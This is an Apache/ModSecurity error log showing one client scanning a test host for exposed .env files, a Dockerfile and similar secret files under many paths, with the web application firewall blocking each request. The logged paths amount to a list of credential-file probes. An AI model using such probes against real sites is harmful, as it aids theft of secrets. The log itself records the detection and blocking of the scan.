[Wed Jan 14 12:05:12.738365 2026] [:error] [pid 1400440] [client 35.180.113.122:46542] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWd4aOhQc121WA46NGcXxwAAAAI"]
[Wed Jan 14 12:05:12.821076 2026] [authz_core:error] [pid 1400442] [client 35.180.113.122:46586] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Wed Jan 14 12:05:12.904825 2026] [:error] [pid 1400441] [client 35.180.113.122:46640] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWd4aPDQTrRwdMNdhh-mwgAAAAM"]
[Wed Jan 14 12:05:12.905030 2026] [:error] [pid 1400441] [client 35.180.113.122:46640] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWd4aPDQTrRwdMNdhh-mwgAAAAM"]
[Wed Jan 14 12:05:12.905219 2026] [:error] [pid 1400441] [client 35.180.113.122:46640] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWd4aPDQTrRwdMNdhh-mwgAAAAM"]
[Wed Jan 14 12:05:12.989725 2026] [:error] [pid 1400463] [client 35.180.113.122:46680] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWd4aBBlpHg03ETPJhlXGQAAAAU"]
[Wed Jan 14 12:05:12.990038 2026] [:error] [pid 1400463] [client 35.180.113.122:46680] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWd4aBBlpHg03ETPJhlXGQAAAAU"]
[Wed Jan 14 12:05:12.990280 2026] [:error] [pid 1400463] [client 35.180.113.122:46680] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWd4aBBlpHg03ETPJhlXGQAAAAU"]
[Wed Jan 14 12:05:13.070702 2026] [authz_core:error] [pid 1405561] [client 35.180.113.122:46726] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Wed Jan 14 12:05:13.153569 2026] [:error] [pid 1400438] [client 35.180.113.122:46778] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWd4aUBaCnzgGdZXs4_g5QAAAAA"]
[Wed Jan 14 12:05:13.153773 2026] [:error] [pid 1400438] [client 35.180.113.122:46778] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWd4aUBaCnzgGdZXs4_g5QAAAAA"]
[Wed Jan 14 12:05:13.153930 2026] [:error] [pid 1400438] [client 35.180.113.122:46778] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWd4aUBaCnzgGdZXs4_g5QAAAAA"]
[Wed Jan 14 12:05:13.240878 2026] [:error] [pid 1401182] [client 35.180.113.122:46814] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWd4afL7maAL7YwXfyRGAwAAAAY"]
[Wed Jan 14 12:05:13.241108 2026] [:error] [pid 1401182] [client 35.180.113.122:46814] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWd4afL7maAL7YwXfyRGAwAAAAY"]
[Wed Jan 14 12:05:13.241292 2026] [:error] [pid 1401182] [client 35.180.113.122:46814] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWd4afL7maAL7YwXfyRGAwAAAAY"]
[Wed Jan 14 12:05:13.324739 2026] [:error] [pid 1400439] [client 35.180.113.122:46870] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aWd4aRZiJWN5ANZoWOd01wAAAAE"]
[Wed Jan 14 12:05:13.324951 2026] [:error] [pid 1400439] [client 35.180.113.122:46870] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aWd4aRZiJWN5ANZoWOd01wAAAAE"]
[Wed Jan 14 12:05:13.325114 2026] [:error] [pid 1400439] [client 35.180.113.122:46870] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aWd4aRZiJWN5ANZoWOd01wAAAAE"]
[Wed Jan 14 12:05:13.406035 2026] [:error] [pid 1409076] [client 35.180.113.122:46924] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWd4aUtembrIGtEDNjOE9QAAAAg"]
[Wed Jan 14 12:05:13.406251 2026] [:error] [pid 1409076] [client 35.180.113.122:46924] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWd4aUtembrIGtEDNjOE9QAAAAg"]
[Wed Jan 14 12:05:13.406447 2026] [:error] [pid 1409076] [client 35.180.113.122:46924] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWd4aUtembrIGtEDNjOE9QAAAAg"]
[Wed Jan 14 12:05:13.490649 2026] [:error] [pid 1400440] [client 35.180.113.122:46970] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWd4aehQc121WA46NGcXyAAAAAI"]
[Wed Jan 14 12:05:13.491461 2026] [:error] [pid 1400440] [client 35.180.113.122:46970] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWd4aehQc121WA46NGcXyAAAAAI"]
[Wed Jan 14 12:05:13.491621 2026] [:error] [pid 1400440] [client 35.180.113.122:46970] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWd4aehQc121WA46NGcXyAAAAAI"]
[Wed Jan 14 12:05:13.570138 2026] [:error] [pid 1400442] [client 35.180.113.122:47016] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWd4aXdjbuaU9rmVGArPTAAAAAQ"]
[Wed Jan 14 12:05:13.570364 2026] [:error] [pid 1400442] [client 35.180.113.122:47016] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWd4aXdjbuaU9rmVGArPTAAAAAQ"]
[Wed Jan 14 12:05:13.570538 2026] [:error] [pid 1400442] [client 35.180.113.122:47016] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWd4aXdjbuaU9rmVGArPTAAAAAQ"]
[Wed Jan 14 12:05:13.663274 2026] [:error] [pid 1400441] [client 35.180.113.122:47054] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWd4afDQTrRwdMNdhh-mwwAAAAM"]
[Wed Jan 14 12:05:13.663491 2026] [:error] [pid 1400441] [client 35.180.113.122:47054] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWd4afDQTrRwdMNdhh-mwwAAAAM"]
[Wed Jan 14 12:05:13.663651 2026] [:error] [pid 1400441] [client 35.180.113.122:47054] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWd4afDQTrRwdMNdhh-mwwAAAAM"]
[Wed Jan 14 12:05:13.745977 2026] [:error] [pid 1400463] [client 35.180.113.122:47100] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWd4aRBlpHg03ETPJhlXGgAAAAU"]
[Wed Jan 14 12:05:13.746188 2026] [:error] [pid 1400463] [client 35.180.113.122:47100] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWd4aRBlpHg03ETPJhlXGgAAAAU"]
[Wed Jan 14 12:05:13.746369 2026] [:error] [pid 1400463] [client 35.180.113.122:47100] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWd4aRBlpHg03ETPJhlXGgAAAAU"]
[Wed Jan 14 12:05:13.825799 2026] [:error] [pid 1405561] [client 35.180.113.122:47150] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWd4aTszkuqYgM6kDsoCpQAAAAc"]
[Wed Jan 14 12:05:13.826013 2026] [:error] [pid 1405561] [client 35.180.113.122:47150] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWd4aTszkuqYgM6kDsoCpQAAAAc"]
[Wed Jan 14 12:05:13.826168 2026] [:error] [pid 1405561] [client 35.180.113.122:47150] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWd4aTszkuqYgM6kDsoCpQAAAAc"]
[Wed Jan 14 12:05:13.908173 2026] [:error] [pid 1400438] [client 35.180.113.122:47192] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aWd4aUBaCnzgGdZXs4_g5gAAAAA"]
[Wed Jan 14 12:05:13.908512 2026] [:error] [pid 1400438] [client 35.180.113.122:47192] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aWd4aUBaCnzgGdZXs4_g5gAAAAA"]
[Wed Jan 14 12:05:13.908744 2026] [:error] [pid 1400438] [client 35.180.113.122:47192] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aWd4aUBaCnzgGdZXs4_g5gAAAAA"]
[Wed Jan 14 12:05:13.988574 2026] [:error] [pid 1401182] [client 35.180.113.122:47240] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aWd4afL7maAL7YwXfyRGBAAAAAY"]
[Wed Jan 14 12:05:13.988789 2026] [:error] [pid 1401182] [client 35.180.113.122:47240] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aWd4afL7maAL7YwXfyRGBAAAAAY"]
[Wed Jan 14 12:05:13.988960 2026] [:error] [pid 1401182] [client 35.180.113.122:47240] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aWd4afL7maAL7YwXfyRGBAAAAAY"]
